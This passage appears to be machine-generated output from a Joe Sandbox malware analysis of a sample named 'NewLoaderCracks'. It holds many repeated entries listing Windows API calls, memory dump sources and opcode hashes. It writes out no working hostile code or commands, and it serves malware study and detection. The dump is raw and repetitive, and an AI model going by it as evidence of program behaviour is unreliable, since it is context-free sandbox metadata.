                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: CreateFile
                • String ID:
                • API String ID: 823142352-0
                • Opcode ID: 1dccec9286cd2ab3c45551175ec00c54c335b06f05d7eaccc94ba7087c21945c
                • Instruction ID: 9ee596335fb9b6b05e90b53682cf2c76199a922bc8b5517c1439d521b4dd3628
                • Opcode Fuzzy Hash: 1dccec9286cd2ab3c45551175ec00c54c335b06f05d7eaccc94ba7087c21945c
                • Instruction Fuzzy Hash: E021F8B1110745AFE7308F54C886FE77BE8FB4A768F00491DF5D582191C374AC889B61
                APIs
                • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00547547,?,?,?,?), ref: 00549D7C
                • SetFileTime.KERNELBASE(?,?,?,?), ref: 00549E2C
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: File$BuffersFlushTime
                • String ID:
                • API String ID: 1392018926-0
                • Opcode ID: 7c5a5eb05442f01775a779b2f27cf039264ec7a9de116cd5a664e23d1a0ea4ad
                • Instruction ID: cfc337882b0008f6d75cd4c5c2401d37aa1b4ea9739fbe590428baf2a968eff5
                • Opcode Fuzzy Hash: 7c5a5eb05442f01775a779b2f27cf039264ec7a9de116cd5a664e23d1a0ea4ad
                • Instruction Fuzzy Hash: 0D21D372548246ABC714DE24C896AEBBFE4BF96708F04091DB8D187181D329EA0CDBA1
                APIs
                • GetProcAddress.KERNEL32(00000000,00573958), ref: 0056A4B8
                • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 0056A4C5
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: AddressProc__crt_fast_encode_pointer
                • String ID:
                • API String ID: 2279764990-0
                • Opcode ID: 2d6fc29081e3c310f38aba6c5844f088e04f1d3fc2fc3aa260170cf46a90b0ca
                • Instruction ID: 613a9a2ea71c0bbe9e850b0d16eaa640c54a2678d4cc7d8075eb7dcaa000627f
                • Opcode Fuzzy Hash: 2d6fc29081e3c310f38aba6c5844f088e04f1d3fc2fc3aa260170cf46a90b0ca
                • Instruction Fuzzy Hash: 3C113633A012218B9F229E28FC4986A7B91BB857617164220FD19FB244EF70DC45EBD2
                APIs
                • SetFilePointer.KERNELBASE(?,?,?,?,-00001964,?,00000800,-00001964,00549B35,?,?,00000000,?,?,00548D9C,?), ref: 00549BC0
                • GetLastError.KERNEL32 ref: 00549BCD
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: ErrorFileLastPointer
                • String ID:
                • API String ID: 2976181284-0
                • Opcode ID: dbc63e3fb77d4d326dc57f808c1bd4cc67e30c9897fa3d80faeb721e05283542
                • Instruction ID: 67a321fbfca0daa7b8ff0af01e7f771a15249d7e7dd939fe914de87d372fb9ab
                • Opcode Fuzzy Hash: dbc63e3fb77d4d326dc57f808c1bd4cc67e30c9897fa3d80faeb721e05283542
                • Instruction Fuzzy Hash: 7E0108313082159F8B08CE65BC869FFBB59FFC0325B10462DF81683281CA30D805A622
                APIs
                • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 00549E76
                • GetLastError.KERNEL32 ref: 00549E82
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: ErrorFileLastPointer
                • String ID:
                • API String ID: 2976181284-0
                • Opcode ID: 68bb163910c917cb7fe31bf68e3c6abc9a5f72c5b456ee5c3eb837eeba7d4e0e
                • Instruction ID: ec7284ab1d9145534454a7b1e647669d9067253adb39b17620f7c51cb5b4bf4d
                • Opcode Fuzzy Hash: 68bb163910c917cb7fe31bf68e3c6abc9a5f72c5b456ee5c3eb837eeba7d4e0e
                • Instruction Fuzzy Hash: B401B5713042006BEB34DE29DC49BABBBDDBB85328F14493DB146C3680DA71EC4C9611
                APIs
                • _free.LIBCMT ref: 00568627
                  • Part of subcall function 00568518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0056C13D,00000000,?,005667E2,?,00000008,?,005689AD,?,?,?), ref: 0056854A
                • HeapReAlloc.KERNEL32(00000000,?,?,?,?,00580F50,0054CE57,?,?,?,?,?,?), ref: 00568663
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: Heap$AllocAllocate_free
                • String ID:
                • API String ID: 2447670028-0
                • Opcode ID: 3ea9624109ec23c5ef19817d8e9510f50aeb4129dd51afb84c64fd58fb78c335
                • Instruction ID: 435724e1470bf643f48795431b929597f140c6f837bf78eac405326b3859f886
                • Opcode Fuzzy Hash: 3ea9624109ec23c5ef19817d8e9510f50aeb4129dd51afb84c64fd58fb78c335
                • Instruction Fuzzy Hash: DAF0C23120111666CB312A25EC04A7B3F58BFF27B0F248715F86597291DE70D800A5A5
                APIs
                • GetCurrentProcess.KERNEL32(?,?), ref: 00550915
                • GetProcessAffinityMask.KERNEL32(00000000), ref: 0055091C
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: Process$AffinityCurrentMask
                • String ID:
                • API String ID: 1231390398-0
                • Opcode ID: fbd19c8f7dc9f9b53d30e2991171c50a4bf0463731b62c2619660daf0b6a1b1f
                • Instruction ID: 4072ac389d0656b26428bc40dc6eeabbe0f572c81571890caa380fe51e4f8aec
                • Opcode Fuzzy Hash: fbd19c8f7dc9f9b53d30e2991171c50a4bf0463731b62c2619660daf0b6a1b1f
                • Instruction Fuzzy Hash: 9DE09B72A10106ABAF05CAA49C144FB7BBDFB14312710517BAC4AD3145F530DD099660
                APIs
                • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0054A27A,?,?,?,0054A113,?,00000001,00000000,?,?), ref: 0054A458
                • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0054A27A,?,?,?,0054A113,?,00000001,00000000,?,?), ref: 0054A489
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: AttributesFile
                • String ID:
                • API String ID: 3188754299-0
                • Opcode ID: 6e35cfe98b9bdd8628a708b1a46f6b8da8102c81bdaffd7ac8f22a4184cf6b3b
                • Instruction ID: ca3b7da3ab5a582d342be7f5123068d6a73d64a7e2f50ca2c2000ef2f87bb7f3
                • Opcode Fuzzy Hash: 6e35cfe98b9bdd8628a708b1a46f6b8da8102c81bdaffd7ac8f22a4184cf6b3b
                • Instruction Fuzzy Hash: 79F0303128020DBBDF115F61DC49FD97B6CBB04395F448051BC8C96161DB76DAA8BA50
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: ItemText_swprintf
                • String ID:
                • API String ID: 3011073432-0
                • Opcode ID: a4e471b4465410fbb37e42bc682760d8bdb234b39a09533bdce545cf28604928
                • Instruction ID: 0bd246d73bff484057c566e821fe03b3576ebc96bd17d2df09177b2cd48a7ae7
                • Opcode Fuzzy Hash: a4e471b4465410fbb37e42bc682760d8bdb234b39a09533bdce545cf28604928
                • Instruction Fuzzy Hash: 00F0EC725003497ADF21AB709C0BFA93F6CF70574AF040996BF04670B2E9716A689771
                APIs
                • DeleteFileW.KERNELBASE(?,?,?,0054984C,?,?,00549688,?,?,?,?,00571FA1,000000FF), ref: 0054A13E
                • DeleteFileW.KERNEL32(?,?,?,00000800,?,?,0054984C,?,?,00549688,?,?,?,?,00571FA1,000000FF), ref: 0054A16C
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: DeleteFile
                • String ID:
                • API String ID: 4033686569-0
                • Opcode ID: c850a30ed187cf1252ecc71e2d550874ed1b23a73b5a892e9c5c93155a2e5d80
                • Instruction ID: f8b22c2d8fc60f377e33cec723e026c2235d90fe323f48e94596ffc7b02d3d10
                • Opcode Fuzzy Hash: c850a30ed187cf1252ecc71e2d550874ed1b23a73b5a892e9c5c93155a2e5d80
                • Instruction Fuzzy Hash: B3E09B7958020967DB115F60DC45FE97B5CBB04391F444065BC88C3050DB61DDD8FA50
                APIs
                • GdiplusShutdown.GDIPLUS(?,?,?,?,00571FA1,000000FF), ref: 0055A3D1
                • CoUninitialize.COMBASE(?,?,?,?,00571FA1,000000FF), ref: 0055A3D6
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: GdiplusShutdownUninitialize
                • String ID:
                • API String ID: 3856339756-0
                • Opcode ID: 287851707f6d344fb7f009dfcf29125cb21d2a6b88dfca8931f362d24b0259f2
                • Instruction ID: 18e04baabc74e68432d0a054cc3e1ca8ef93545a01fa691f30c3347d3e75676b
                • Opcode Fuzzy Hash: 287851707f6d344fb7f009dfcf29125cb21d2a6b88dfca8931f362d24b0259f2
                • Instruction Fuzzy Hash: 97F03936618A55EFC7109B4CEC06B19FBA8FB89B20F04436AF81993B61CB746800DB91
                APIs
                • GetFileAttributesW.KERNELBASE(?,?,?,0054A189,?,005476B2,?,?,?,?), ref: 0054A1A5
                • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,0054A189,?,005476B2,?,?,?,?), ref: 0054A1D1
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: AttributesFile
                • String ID:
                • API String ID: 3188754299-0
                • Opcode ID: 4087311d11ff2aff680bd2979131a5e50f3f70459c7aa4571dad92ff625d39ad
                • Instruction ID: 7d1168d9dc4c77fbf57292bce7483b6256cc0f9470f50c5da4404844f5d72535
                • Opcode Fuzzy Hash: 4087311d11ff2aff680bd2979131a5e50f3f70459c7aa4571dad92ff625d39ad
                • Instruction Fuzzy Hash: EEE09B3550011897CB10AB64DC09FD57B5CBB183F1F0041A1FD48D3190D7709D88AAE0
                APIs
                • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 005500A0
                • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0054EB86,Crypt32.dll,00000000,0054EC0A,?,?,0054EBEC,?,?,?), ref: 005500C2
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: DirectoryLibraryLoadSystem
                • String ID:
                • API String ID: 1175261203-0
                • Opcode ID: 74b3b30a303f4e4058882e77077740522977a6cf95c6d6bd4611a63ad37da81f
                • Instruction ID: 3287b6563da41e62363dbecbaf2c5aeba959aa22f3d6ac1741db8a02159ef8a8
                • Opcode Fuzzy Hash: 74b3b30a303f4e4058882e77077740522977a6cf95c6d6bd4611a63ad37da81f
                • Instruction Fuzzy Hash: F6E0927690112C6ADB209AA4AC0DFD67BACFF19392F0400A6B908D3044DA70DA889BA0
                APIs
                • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00559B30
                • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00559B37
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: BitmapCreateFromGdipStream
                • String ID:
                • API String ID: 1918208029-0
                • Opcode ID: 961df4d8de9b9f64f81a37a52a2912b18f2b4e70d397460652da7b8038b5adba
                • Instruction ID: 201bbedf2c313641c99f1186361ae211dc39a963326851f426df54c6454f64c0
                • Opcode Fuzzy Hash: 961df4d8de9b9f64f81a37a52a2912b18f2b4e70d397460652da7b8038b5adba
                • Instruction Fuzzy Hash: 0EE0ED75905218EFDB14DF98E90569ABBE8FB08322F20805BEC9993204D7756E089F91
                APIs
                  • Part of subcall function 0056329A: try_get_function.LIBVCRUNTIME ref: 005632AF
                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0056217A
                • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00562185
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                • String ID:
                • API String ID: 806969131-0
                • Opcode ID: 83b2415420e4a71d7e5ac74e9fe3c688676dbf311c364a1fe178d21c8039fafb
                • Instruction ID: a5967df538166c5c713a549e5b4b8b13987a3d7ef148467007d14606f29612eb
                • Opcode Fuzzy Hash: 83b2415420e4a71d7e5ac74e9fe3c688676dbf311c364a1fe178d21c8039fafb
                • Instruction Fuzzy Hash: CAD0C93964CF07646A9826B4386A5AD2F847AA3BB4FE04B86E6208B5D2EE358145F111
                APIs
                • DloadLock.DELAYIMP ref: 0055DC73
                • DloadProtectSection.DELAYIMP ref: 0055DC8F
                  • Part of subcall function 0055DE67: DloadObtainSection.DELAYIMP ref: 0055DE77
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: Dload$Section$LockObtainProtect
                • String ID:
                • API String ID: 731663317-0
                • Opcode ID: a0443b34529bf0e43141a251894907fea965d561544c56e764221ba0b4a58cb1
                • Instruction ID: 2ce9f9d93b4757f1608cfc31248783bb818abb6edd9711adb2b9149da7661066
                • Opcode Fuzzy Hash: a0443b34529bf0e43141a251894907fea965d561544c56e764221ba0b4a58cb1
                • Instruction Fuzzy Hash: 07D0A932080201AAC230AB10A87A30C7A70B721796F601603A806860E0DBE41C8CE221
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: ItemShowWindow
                • String ID:
                • API String ID: 3351165006-0
                • Opcode ID: f0c0b29d33d3a2244a6b968aaa52283dea8e1624e9bc8217d8710745abbcf4d3
                • Instruction ID: e3c96037a7ab4d0a7332c3894326256e4535ccfe31167c18fad2718d6b6a1c6b
                • Opcode Fuzzy Hash: f0c0b29d33d3a2244a6b968aaa52283dea8e1624e9bc8217d8710745abbcf4d3
                • Instruction Fuzzy Hash: CBC01232058200BECB010BB4DC0AD2FBBA8EBA6212F05C908B2A5C0060C238C018EB11
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: b0d59ca21c3c769606199f08a66a67a8f5ac631901157785394110dfddcc2af1
